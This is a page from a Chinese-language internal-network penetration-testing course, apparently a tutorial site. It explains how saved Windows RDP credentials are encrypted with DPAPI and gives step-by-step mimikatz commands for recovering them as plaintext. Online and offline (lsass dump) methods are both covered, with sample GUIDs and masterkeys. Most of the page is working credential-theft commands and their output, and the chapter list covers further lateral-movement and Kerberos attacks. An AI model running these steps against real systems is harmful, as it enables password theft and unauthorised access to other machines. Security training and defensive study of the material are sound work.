内网渗透
01基础知识
02域环境的搭建
03工作组权限
04域内权限
05Windows本地认证
06网络认证
07Kerberos协议
08工作组的信息搜集
09域内的信息搜集
10工作组的密码抓取
11域内的密码抓取
12Dcsync原理以及攻击
13RDP密码凭证抓取
14横向移动概述
15IPC$横向移动
16PTH哈希传递
17PTK密钥传递
18PTT票据传递
19PSexec进行横向移动
20SMBexec进行横向移动
21利用WinRM服务进行横向移动
22利用WMI进行横向移动
23用户枚举与喷洒
24用户枚举与喷洒-实验
25Roasting攻击
26Kerberoasting
27黄金票据
28黄金票据-实验
29白银票据
30白银票据-实验
31委派概述
32非约束性委派攻击
33约束性委派攻击
34约束性委派攻击-实验
35基于资源的约束性委派
36基于资源的约束性委派-实验
-
+
首页
13RDP密码凭证抓取
## 明文密码抓取原理 Credentials的解密是Windows系统信息收集中非常重要的一环 在平时的工作中,管理员为了方便管理计算机,经常会进行远程桌面连接,由于每次都需要输入密码觉得麻烦,就点击了保留凭据。 这个过程是可逆,所以我们可以将保存的密码进行还原。  > 还原的原理 Windows通过MasterKey将我们的密码加密后保存在本地,由于Windows还需要解密使用这个密码,所以这个过程是可逆,我们只要拿到 MasterKey就能将密码解出来。 > 查看凭证方法 1、查看远程桌面的连接记录 命令:cmdkey /list  2、查找本地的的Credentials ``` dir /a %userprofile%\appdata\local\microsoft\credentials\* ```  ### 在线读取RDP明文密码 1、使用mimikatz获取该文件的MasterKey的guid值 ``` dpapi::cred /in:凭据绝对路径 ``` 绝对路径:C:\Users\ls\appdata\local\microsoft\credentials\0CD7F2C49F30735B50B8B25B21588322 ``` dpapi::cred /in:C:\Users\ls\appdata\local\microsoft\credentials\0CD7F2C49F30735B50B8B25B21588322 ```  guid值为4fdb635b-6699-43d0-b6d9-553daa1d0dc6 2、使用mimikatz工具在内存中找到对应的masterkey值 ``` mimikatz # privilege::debug Privilege '20' OK mimikatz # sekurlsa::dpapi ```  masterkey值为:2fbdd5de3bb48c79c468f096ddc90d21c0f1a8e9d30ff6eb70466a45d5cf746523b2fd6b60327b0ea0e1ea35e188da268ebb57506f9935a784779701651fb58d 3、使用mimikatz工具通过masterkey值解密RDP凭据文件 ``` dpapi::cred /in:凭据文件路径 /masterkey:masterkey值 ``` ``` dpapi::cred /in:C:\Users\ls\appdata\local\microsoft\credentials\0CD7F2C49F30735B50B8B25B21588322 /masterkey:2fbdd5de3bb48c79c468f096ddc90d21c0f1a8e9d30ff6eb70466a45d5cf746523b2fd6b60327b0ea0e1ea35e188da268ebb57506f9935a784779701651fb58d ```  ### 离线读取RDP明文密码 1、下载目标的lsass内存文件   2、将RDP凭证下载到本地 ``` dir /a %userprofile%\appdata\local\microsoft\credentials\* ```  当打开对应目录没有文件时,需要修改对应的文件夹属性  在查看功能点,将隐藏受保护的操作系统文件的勾取消即可看到文件  将对应的RDP凭证下载到本地  3、使用mimikatz载入dump回来的内存 ``` Sekurlsa::minidump lsass.dmp ```  4、获取credentials的GUID值 ``` dpapi::cred /in:凭证名称 ``` ``` dpapi::cred /in:0CD7F2C49F30735B50B8B25B21588322 ```  guidMasterkey值为4fdb635b-6699-43d0-b6d9-553daa1d0dc6 5、获取内存中所有的masterkey ``` sekurlsa::dpapi ``` 寻找guid对应的Masterkey值  masterkey值为2fbdd5de3bb48c79c468f096ddc90d21c0f1a8e9d30ff6eb70466a45d5cf746523b2fd6b60327b0ea0e1ea35e188da268ebb57506f9935a784779701651fb58d 6、masterkey进行解密 ``` dpapi::cred /in:凭据文件名 /masterkey:masterkey值 ``` ``` dpapi::cred /in:0CD7F2C49F30735B50B8B25B21588322 /masterkey:2fbdd5de3bb48c79c468f096ddc90d21c0f1a8e9d30ff6eb70466a45d5cf746523b2fd6b60327b0ea0e1ea35e188da268ebb57506f9935a784779701651fb58d ``` 
毛林
2025年9月7日 11:39
转发文档
收藏文档
上一篇
下一篇
手机扫码
复制链接
手机扫一扫转发分享
复制链接
Markdown文件
PDF文档(打印)
分享
链接
类型
密码
更新密码